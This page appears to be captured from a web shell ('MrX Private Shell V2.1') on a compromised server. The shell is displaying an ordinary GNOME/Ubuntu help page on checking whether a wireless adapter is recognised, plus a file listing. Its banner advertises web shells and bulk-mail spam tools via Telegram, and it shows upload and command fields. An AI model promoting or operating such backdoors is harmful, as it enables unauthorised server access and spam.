__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<page xmlns="http://projectmallard.org/1.0/"
      xmlns:its="http://www.w3.org/2005/11/its"
      type="topic" style="task"
      id="net-wireless-troubleshooting-hardware-check">

  <info>
    <link type="next" xref="net-wireless-troubleshooting-device-drivers"/>
    <link type="guide" xref="net-wireless-troubleshooting"/>

    <revision pkgversion="3.4.0" date="2012-03-05" status="outdated"/>
    <revision pkgversion="3.10" date="2013-11-10" status="review"/>
    <revision pkgversion="3.18" date="2015-09-28" status="final"/>

    <credit type="author">
      <name>Contributors to the Ubuntu documentation wiki</name>
    </credit>
    <credit type="author">
      <name>GNOME Documentation Project</name>
      <email>[email protected]</email>
    </credit>

    <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/>

    <desc>Even though your wireless adapter is connected, it may not have been
    recognized properly by the computer.</desc>
  </info>

  <title>Wireless connection troubleshooter</title>
  <subtitle>Check that the wireless adapter was recognized</subtitle>

  <p>Even though the wireless adapter is connected to the computer, it may not
  have been recognized as a network device by the computer. In this step, you
  will check whether the device was recognized properly.</p>

  <steps>
    <item>
      <p>Open a Terminal window, type <cmd>lshw -C network</cmd> and press
      <key>Enter</key>. If this gives an error message, you may need to install
      the <app>lshw</app> program on your computer.</p>
    </item>
    <item>
      <p>Look through the information that appeared and find the <em>Wireless
      interface</em> section. If your wireless adapter was detected properly,
      you should see something similar (but not identical) to this:</p>
      <code><![CDATA[*-network
       description: Wireless interface
       product: PRO/Wireless 3945ABG [Golan] Network Connection
       vendor: Intel Corporation]]></code>
    </item>
    <item>
      <p>If a wireless device is listed, continue on to the
      <link xref="net-wireless-troubleshooting-device-drivers">Device Drivers
      step</link>.</p>
      <p>If a wireless device is <em>not</em> listed, the next steps you take
      will depend on the type of device that you use. Refer to the section
      below that is relevant to the type of wireless adapter that your computer
      has (<link xref="#pci">internal PCI</link>, <link xref="#usb">USB</link>,
      or <link xref="#pcmcia">PCMCIA</link>).</p>
    </item>
  </steps>

<section id="pci">
  <title>PCI (internal) wireless adapter</title>

  <p>Internal PCI adapters are the most common, and are found in most laptops
  made within the past few years. To check if your PCI wireless adapter was
  recognized:</p>

  <steps>
    <item>
      <p>Open a Terminal, type <cmd>lspci</cmd> and press <key>Enter</key>.</p>
    </item>
    <item>
      <p>Look through the list of devices that is shown and find any that are
      marked <code>Network controller</code> or <code>Ethernet
      controller</code>. Several devices may be marked in this way; the one
      corresponding to your wireless adapter might include words like
      <code>wireless</code>, <code>WLAN</code>, <code>wifi</code> or
      <code>802.11</code>. Here is an example of what the entry might look
      like:</p>
      <code>Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection</code>
    </item>
    <item>
      <p>If you found your wireless adapter in the list, proceed to the
      <link xref="net-wireless-troubleshooting-device-drivers">Device Drivers
      step</link>. If you didn’t find anything related to your wireless
      adapter, see
      <link xref="#not-recognized">the instructions below</link>.</p>
    </item>
  </steps>

</section>

<section id="usb">
  <title>USB wireless adapter</title>

  <p>Wireless adapters that plug into a USB port on your computer are less
  common. They can plug directly into a USB port, or may be connected by a USB
  cable. 3G/mobile broadband adapters look quite similar to wireless (Wi-Fi)
  adapters, so if you think you have a USB wireless adapter, double-check that
  it is not actually a 3G adapter. To check if your USB wireless adapter was
  recognized:</p>

  <steps>
    <item>
      <p>Open a Terminal, type <cmd>lsusb</cmd> and press <key>Enter</key>.</p>
    </item>
    <item>
      <p>Look through the list of devices that is shown and find any that seem
      to refer to a wireless or network device. The one corresponding to your
      wireless adapter might include words like <code>wireless</code>,
      <code>WLAN</code>, <code>wifi</code> or <code>802.11</code>. Here is an
      example of what the entry might look like:</p>
      <code><![CDATA[Bus 005 Device 009: ID 12d1:140b Huawei Technologies Co., Ltd. EC1260 Wireless Data Modem HSD USB Card]]></code>
    </item>
    <item>
      <p>If you found your wireless adapter in the list, proceed to the
      <link xref="net-wireless-troubleshooting-device-drivers">Device Drivers
      step</link>. If you didn’t find anything related to your wireless
      adapter, see
      <link xref="#not-recognized">the instructions below</link>.</p>
    </item>
  </steps>

</section>

<section id="pcmcia">
  <title>Checking for a PCMCIA device</title>

  <p>PCMCIA wireless adapters are typically rectangular cards which slot into
  the side of your laptop. They are more commonly found in older computers. To
  check if your PCMCIA adapter was recognized:</p>

  <steps>
    <item>
      <p>Start your computer <em>without</em> the wireless adapter plugged
      in.</p>
    </item>
    <item>
      <p>Open a Terminal and type the following, then press
      <key>Enter</key>:</p>
      <code>tail -f /var/log/messages</code>
      <p>This will display a list of messages related to your computer’s
      hardware, and will automatically update if anything to do with your
      hardware changes.</p>
    </item>
    <item>
      <p>Insert your wireless adapter into the PCMCIA slot and see what
      changes in the Terminal window. The changes should include some
      information about your wireless adapter. Look through them and see if you
      can identify it.</p>
    </item>
    <item>
      <p>To stop the command from running in the Terminal, press
      <keyseq><key>Ctrl</key><key>C</key></keyseq>. After you have done that,
      you can close the Terminal if you like.</p>
    </item>
    <item>
      <p>If you found any information about your wireless adapter, proceed to
      the <link xref="net-wireless-troubleshooting-device-drivers">Device
      Drivers step</link>. If you didn’t find anything related to your wireless
      adapter, see <link xref="#not-recognized">the instructions
      below</link>.</p>
    </item>
  </steps>
</section>

<section id="not-recognized">
  <title>Wireless adapter was not recognized</title>

  <p>If your wireless adapter was not recognized, it might not be working
  properly or the correct drivers may not be installed for it. How you check to
  see if there are any drivers you can install will depend on which Linux
  distribution you are using (like Ubuntu, Arch, Fedora or openSUSE).</p>

  <p>To get specific help, look at the support options on your distribution’s
  website. These might include mailing lists and web chats where you can ask
  about your wireless adapter, for example.</p>

</section>

</page>

Filemanager

Name Type Size Permission Actions
figures Folder 0755
a11y-bouncekeys.page File 2.78 KB 0644
a11y-braille.page File 1.45 KB 0644
a11y-contrast.page File 2.18 KB 0644
a11y-dwellclick.page File 3.33 KB 0644
a11y-font-size.page File 2.27 KB 0644
a11y-icon.page File 2.27 KB 0644
a11y-mag.page File 2.85 KB 0644
a11y-right-click.page File 3.16 KB 0644
a11y-screen-reader.page File 2.28 KB 0644
a11y-slowkeys.page File 3.21 KB 0644
a11y-stickykeys.page File 4.04 KB 0644
a11y-visualalert.page File 2.51 KB 0644
a11y.page File 2.28 KB 0644
about-hardware.page File 1.57 KB 0644
about-hostname.page File 1.58 KB 0644
about-os.page File 1.64 KB 0644
about-this-guide.page File 1.97 KB 0644
about.page File 871 B 0644
accounts-add.page File 3.21 KB 0644
accounts-disable-service.page File 2.45 KB 0644
accounts-provider-not-available.page File 1.34 KB 0644
accounts-remove.page File 2.63 KB 0644
accounts-which-application.page File 4.01 KB 0644
accounts-whyadd.page File 1.59 KB 0644
accounts.page File 1 KB 0644
addremove-creator.page File 1.97 KB 0644
addremove-install-synaptic.page File 2.68 KB 0644
addremove-install.page File 2.56 KB 0644
addremove-ppa.page File 2.18 KB 0644
addremove-remove.page File 2.55 KB 0644
addremove-sources.page File 2.4 KB 0644
addremove.page File 749 B 0644
app-cheese.page File 870 B 0644
backup-check.page File 1.77 KB 0644
backup-frequency.page File 1.97 KB 0644
backup-how.page File 2.44 KB 0644
backup-restore.page File 1.29 KB 0644
backup-thinkabout.page File 3.24 KB 0644
backup-what.page File 2.45 KB 0644
backup-where.page File 2.21 KB 0644
backup-why.page File 1.23 KB 0644
bluetooth-connect-device.page File 3.96 KB 0644
bluetooth-device-specific-pairing.page File 3.69 KB 0644
bluetooth-problem-connecting.page File 3.31 KB 0644
bluetooth-remove-connection.page File 2.39 KB 0644
bluetooth-send-file.page File 3.17 KB 0644
bluetooth-turn-on-off.page File 3.13 KB 0644
bluetooth-visibility.page File 2.46 KB 0644
bluetooth.page File 2.25 KB 0644
clock-calendar.page File 2.52 KB 0644
clock-set.page File 2.28 KB 0644
clock-timezone.page File 2.38 KB 0644
clock-world.page File 2.08 KB 0644
clock.page File 666 B 0644
color-assignprofiles.page File 2.51 KB 0644
color-calibrate-camera.page File 1.53 KB 0644
color-calibrate-printer.page File 1.57 KB 0644
color-calibrate-scanner.page File 2.36 KB 0644
color-calibrate-screen.page File 2.45 KB 0644
color-calibrationcharacterization.page File 2.55 KB 0644
color-calibrationdevices.page File 819 B 0644
color-calibrationtargets.page File 1.21 KB 0644
color-canshareprofiles.page File 1.62 KB 0644
color-gettingprofiles.page File 1.46 KB 0644
color-howtoimport.page File 2.23 KB 0644
color-missingvcgt.page File 1.09 KB 0644
color-notifications.page File 1.97 KB 0644
color-notspecifiededid.page File 1.27 KB 0644
color-testing.page File 3.14 KB 0644
color-whatisprofile.page File 1.26 KB 0644
color-whatisspace.page File 3.67 KB 0644
color-why-calibrate.page File 1.38 KB 0644
color-whyimportant.page File 3.57 KB 0644
color.page File 828 B 0644
community-support.page File 1.08 KB 0644
contacts-add-remove.page File 2.41 KB 0644
contacts-connect.page File 2.02 KB 0644
contacts-edit-details.page File 2.47 KB 0644
contacts-link-unlink.page File 2.67 KB 0644
contacts-search.page File 1.66 KB 0644
contacts-setup.page File 1.99 KB 0644
contacts.page File 734 B 0644
disk-benchmark.page File 3.01 KB 0644
disk-capacity.page File 3.65 KB 0644
disk-check.page File 2.91 KB 0644
disk-format.page File 2.78 KB 0644
disk-partitions.page File 3.18 KB 0644
disk-repair.page File 4.54 KB 0644
disk-resize.page File 2.84 KB 0644
disk.page File 572 B 0644
display-blank.page File 1.96 KB 0644
display-brightness.page File 2.44 KB 0644
display-dual-monitors.page File 5.53 KB 0644
display-night-light.page File 1.98 KB 0644
files-autorun.page File 5.7 KB 0644
files-browse.page File 3.75 KB 0644
files-copy.page File 4.08 KB 0644
files-delete.page File 3.2 KB 0644
files-disc-write.page File 1.22 KB 0644
files-hidden.page File 3.59 KB 0644
files-lost.page File 2.28 KB 0644
files-open.page File 3.17 KB 0644
files-preview.page File 1.96 KB 0644
files-recover.page File 2.3 KB 0644
files-removedrive.page File 2.74 KB 0644
files-rename-multiple.page File 3.62 KB 0644
files-rename-music-metadata.page File 1.95 KB 0644
files-rename.page File 4.46 KB 0644
files-search.page File 5.3 KB 0644
files-select.page File 2 KB 0644
files-share.page File 2.4 KB 0644
files-sort.page File 3.64 KB 0644
files-templates.page File 2.34 KB 0644
files-tilde.page File 1.8 KB 0644
files.page File 1.79 KB 0644
get-involved.page File 1.29 KB 0644
gnome-classic.page File 5.25 KB 0644
gnome-on-ubuntu.page File 1.94 KB 0644
gnome-version.page File 1.41 KB 0644
hardware-auth.page File 548 B 0644
hardware-cardreader.page File 2.84 KB 0644
hardware-driver.page File 1.67 KB 0644
hardware-problems-graphics.page File 661 B 0644
hardware.page File 1.06 KB 0644
index.page File 1.11 KB 0644
keyboard-cursor-blink.page File 2.03 KB 0644
keyboard-key-menu.page File 2.48 KB 0644
keyboard-key-super.page File 2.34 KB 0644
keyboard-layouts.page File 6.18 KB 0644
keyboard-nav.page File 9.74 KB 0644
keyboard-osk.page File 3.12 KB 0644
keyboard-repeat-keys.page File 2.37 KB 0644
keyboard-shortcuts-set.page File 16.5 KB 0644
keyboard.page File 1.16 KB 0644
legal.xml File 295 B 0644
look-background.page File 4.14 KB 0644
look-display-fuzzy.page File 2.63 KB 0644
look-resolution.page File 5.62 KB 0644
media.page File 1.37 KB 0644
more-help.page File 878 B 0644
mouse-doubleclick.page File 2.54 KB 0644
mouse-lefthanded.page File 1.88 KB 0644
mouse-middleclick.page File 2.88 KB 0644
mouse-mousekeys.page File 3.87 KB 0644
mouse-problem-notmoving.page File 3.45 KB 0644
mouse-sensitivity.page File 2.13 KB 0644
mouse-touchpad-click.page File 7.78 KB 0644
mouse-wakeup.page File 1.36 KB 0644
mouse.page File 1.56 KB 0644
music-cantplay-drm.page File 1.92 KB 0644
nautilus-behavior.page File 3.46 KB 0644
nautilus-bookmarks-edit.page File 2.41 KB 0644
nautilus-connect.page File 7.81 KB 0644
nautilus-display.page File 2.85 KB 0644
nautilus-file-properties-basic.page File 4.53 KB 0644
nautilus-file-properties-permissions.page File 4.37 KB 0644
nautilus-list.page File 5.1 KB 0644
nautilus-prefs.page File 686 B 0644
nautilus-preview.page File 2.45 KB 0644
nautilus-views.page File 2.15 KB 0644
net-antivirus.page File 1.79 KB 0644
net-browser.page File 603 B 0644
net-default-browser.page File 2.15 KB 0644
net-default-email.page File 2.07 KB 0644
net-email-virus.page File 1.88 KB 0644
net-email.page File 928 B 0644
net-findip.page File 3.63 KB 0644
net-firewall-on-off.page File 2.67 KB 0644
net-firewall-ports.page File 2.56 KB 0644
net-fixed-ip-address.page File 3.46 KB 0644
net-general.page File 854 B 0644
net-macaddress.page File 2.64 KB 0644
net-manual.page File 3.57 KB 0644
net-mobile.page File 2.99 KB 0644
net-othersconnect.page File 2.63 KB 0644
net-othersedit.page File 3.23 KB 0644
net-problem.page File 641 B 0644
net-proxy.page File 3.29 KB 0644
net-security-tips.page File 3.03 KB 0644
net-security.page File 699 B 0644
net-slow.page File 3.64 KB 0644
net-vpn-connect.page File 4.09 KB 0644
net-what-is-ip-address.page File 1.83 KB 0644
net-wired-connect.page File 2.62 KB 0644
net-wired.page File 575 B 0644
net-wireless-adhoc.page File 2.93 KB 0644
net-wireless-airplane.page File 2.26 KB 0644
net-wireless-connect.page File 4.27 KB 0644
net-wireless-disconnecting.page File 3.49 KB 0644
net-wireless-find.page File 2.36 KB 0644
net-wireless-hidden.page File 2.97 KB 0644
net-wireless-noconnection.page File 3.05 KB 0644
net-wireless-troubleshooting-device-drivers.page File 4.33 KB 0644
net-wireless-troubleshooting-hardware-check.page File 7.33 KB 0644
net-wireless-troubleshooting-hardware-info.page File 2.76 KB 0644
net-wireless-troubleshooting-initial-check.page File 3.46 KB 0644
net-wireless-troubleshooting.page File 2.42 KB 0644
net-wireless-wepwpa.page File 1.49 KB 0644
net-wireless.page File 1.07 KB 0644
net-wrongnetwork.page File 1.94 KB 0644
net.page File 998 B 0644
numeric-keypad.page File 1.24 KB 0644
parental-controls.page File 6.99 KB 0644
power-autobrightness.page File 1.44 KB 0644
power-autosuspend.page File 1.61 KB 0644
power-batteryestimate.page File 2.72 KB 0644
power-batterylife.page File 4.29 KB 0644
power-batteryoptimal.page File 2.07 KB 0644
power-batteryslow.page File 1.15 KB 0644
power-batterywindows.page File 2.15 KB 0644
power-closelid.page File 3.52 KB 0644
power-constantfan.page File 1.88 KB 0644
power-hotcomputer.page File 2.81 KB 0644
power-lowpower.page File 1.55 KB 0644
power-nowireless.page File 2.45 KB 0644
power-othercountry.page File 2.04 KB 0644
power-percentage.page File 1.36 KB 0644
power-profile.page File 1.9 KB 0644
power-status.page File 2.24 KB 0644
power-suspend.page File 1.9 KB 0644
power-suspendfail.page File 2.95 KB 0644
power-whydim.page File 2.06 KB 0644
power-willnotturnon.page File 3.1 KB 0644
power-wireless.page File 1.45 KB 0644
power.page File 1.39 KB 0644
prefs-display.page File 783 B 0644
prefs-language-install.page File 2.14 KB 0644
prefs-language.page File 667 B 0644
prefs-sharing.page File 880 B 0644
prefs.page File 1.28 KB 0644
printing-2sided.page File 1.76 KB 0644
printing-booklet-duplex.page File 3.01 KB 0644
printing-booklet-singlesided.page File 3.5 KB 0644
printing-booklet.page File 1.79 KB 0644
printing-cancel-job.page File 3.21 KB 0644
printing-differentsize.page File 1.92 KB 0644
printing-envelopes.page File 2.3 KB 0644
printing-inklevel.page File 1.97 KB 0644
printing-name-location.page File 3.4 KB 0644
printing-order.page File 2.08 KB 0644
printing-paperjam.page File 1.38 KB 0644
printing-select.page File 1.35 KB 0644
printing-setup-default-printer.page File 2.41 KB 0644
printing-setup.page File 3.71 KB 0644
printing-streaks.page File 2 KB 0644
printing-to-file.page File 2.06 KB 0644
printing.page File 1.29 KB 0644
privacy-history-recent-off.page File 3.22 KB 0644
privacy-location.page File 1.95 KB 0644
privacy-purge.page File 3.09 KB 0644
privacy-screen-lock.page File 3.51 KB 0644
privacy.page File 1.29 KB 0644
quick-settings.page File 4.43 KB 0644
remote-login.page File 4.85 KB 0644
report-ubuntu-bug.page File 3.2 KB 0644
screen-shot-record.page File 6.92 KB 0644
session-fingerprint.page File 3.85 KB 0644
session-formats.page File 2.56 KB 0644
session-language.page File 3.53 KB 0644
session-screenlocks.page File 2.3 KB 0644
sharing-bluetooth.page File 2.02 KB 0644
sharing-desktop.page File 8.08 KB 0644
sharing-media.page File 3.4 KB 0644
sharing-personal.page File 4.16 KB 0644
sharing-secure-shell.page File 1.6 KB 0644
sharing.page File 573 B 0644
shell-apps-favorites.page File 2.25 KB 0644
shell-apps-open.page File 4.35 KB 0644
shell-exit.page File 5.99 KB 0644
shell-introduction.page File 9.4 KB 0644
shell-keyboard-shortcuts.page File 8.45 KB 0644
shell-lockscreen.page File 1.99 KB 0644
shell-notifications.page File 4.89 KB 0644
shell-overview.page File 1.23 KB 0644
shell-wellbeing.page File 4.72 KB 0644
shell-windows-lost.page File 2.59 KB 0644
shell-windows-maximize.page File 1.92 KB 0644
shell-windows-states.page File 2.3 KB 0644
shell-windows-switching.page File 3.09 KB 0644
shell-windows-tiled.page File 1.39 KB 0644
shell-windows.page File 2.69 KB 0644
shell-workspaces-movewindow.page File 3.84 KB 0644
shell-workspaces-switch.page File 3.01 KB 0644
shell-workspaces.page File 3.58 KB 0644
sound-alert.page File 1.97 KB 0644
sound-broken.page File 1.02 KB 0644
sound-crackle.page File 2.27 KB 0644
sound-nosound.page File 5.21 KB 0644
sound-usemic.page File 2.33 KB 0644
sound-usespeakers.page File 2.53 KB 0644
sound-volume.page File 3.07 KB 0644
startup-applications.page File 1.54 KB 0644
status-icons.page File 20.03 KB 0644
tips-specialchars.page File 6.14 KB 0644
tips.page File 598 B 0644
touchscreen-gestures.page File 3.98 KB 0644
user-accounts.page File 1.51 KB 0644
user-add.page File 3.98 KB 0644
user-admin-change.page File 2.6 KB 0644
user-admin-explain.page File 4.19 KB 0644
user-admin-problems.page File 1.77 KB 0644
user-autologin.page File 2.32 KB 0644
user-changepassword.page File 3.88 KB 0644
user-changepicture.page File 2.89 KB 0644
user-delete.page File 2.74 KB 0644
user-goodpassword.page File 4.01 KB 0644
video-dvd-restricted.page File 1.76 KB 0644
video-dvd.page File 2.9 KB 0644
video-sending.page File 3.14 KB 0644
wacom-left-handed.page File 1.42 KB 0644
wacom-map-buttons.page File 1.74 KB 0644
wacom-mode.page File 1.8 KB 0644
wacom-multi-monitor.page File 2.11 KB 0644
wacom-stylus.page File 2.09 KB 0644
wacom-tablet-unknown.page File 1.69 KB 0644
wacom.page File 965 B 0644
Filemanager